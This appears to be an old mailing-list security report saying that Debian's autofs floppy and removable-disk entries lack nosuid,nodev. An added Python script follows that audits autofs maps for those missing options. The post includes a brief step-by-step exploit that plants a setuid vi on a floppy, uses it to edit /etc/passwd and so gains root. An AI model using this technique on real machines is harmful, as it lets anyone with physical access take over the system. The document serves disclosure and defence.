
SECURITY PROBLEM: autofs [all versions]



I'm obviously doing something wrong ...

I've written to the maintainer of the autofs package according to the
page summary listed under 'packages' from the website, and as I also saw
somewhere else (dpkg -s listing?).  I filed a bug report against autofs
and marked it as release critical.  I have heard nothing for the past
two (three?) days and need to make this known:

There is a severe security problem for all Debian machines running any
version of autofs and having a floppy drive available as /dev/fd0.  The
options listed in /etc/auto.misc fail to include the options
"nosuid,nodev" and as such anyone with a floppy disk and physical access
to a floppy drive may become root on that machine.

Here is the 'sploit:

# superformat /dev/fd0u1440
# mke2fs /dev/fd0
# cp /usr/bin/vi /var/autofs/floppy
# chmod u+s /var/autofs/floppy/vi
# umount /var/autofs/floppy

[sneakernet to victim]

% /var/autofs/floppy/vi /etc/passwd
:wq!

% telnet localhost

[...]

Well, you get the idea.  All user-modifiable filesystems must be mounted
nosuid,nodev or the systems that trust them can be trivially
compromised.  Besides floppy, this also includes the 'removable'
/dev/hdd, and possibly the CD-ROM as well.

regards,
Christopher
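
The check this message calls for, as an added example that is not part of the original post or of the autofs package: a small auditor that parses a Sun-format autofs map such as /etc/auto.misc and reports entries mounted without nosuid or nodev. The names parse_map, audit and SAMPLE_MAP are hypothetical, the sample map is constructed, and options set in auto.master are assumed not to apply.

```python
"""Audit a Sun-format autofs map for entries lacking nosuid/nodev."""
import sys

REQUIRED = ("nosuid", "nodev")

# Constructed sample map, not copied from any real system.
SAMPLE_MAP = """\
# key     options                          location
cd        -fstype=iso9660,ro,nosuid,nodev  :/dev/cdrom
floppy    -fstype=auto                     :/dev/fd0
removable -fstype=ext2,nosuid \\
          :/dev/hdd
"""

def parse_map(text):
    """Yield (key, options, location) for each map entry."""
    logical, buf = [], ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()   # drop comments
        if line.endswith("\\"):                # entry continues on next line
            buf += line[:-1] + " "
            continue
        buf += line
        if buf.strip():
            logical.append(buf)
        buf = ""
    if buf.strip():                            # file ended on a continuation
        logical.append(buf)
    for entry in logical:
        fields = entry.split()
        if len(fields) < 2 or fields[0].startswith("+"):
            continue                           # included map or malformed line
        key, rest, opts = fields[0], fields[1:], set()
        while rest and rest[0].startswith("-"):
            opts.update(o for o in rest[0][1:].split(",") if o)
            rest = rest[1:]
        if rest:
            yield key, opts, " ".join(rest)

def audit(text):
    """Return {key: [missing options]} for entries that need fixing."""
    findings = {}
    for key, opts, _location in parse_map(text):
        missing = [o for o in REQUIRED if o not in opts]
        if missing:
            findings[key] = missing
    return findings

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_MAP
    for key, missing in audit(text).items():
        print(f"{key}: missing {','.join(missing)}")
```

Run it with a map file path as the only argument; with no argument it audits the constructed sample.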


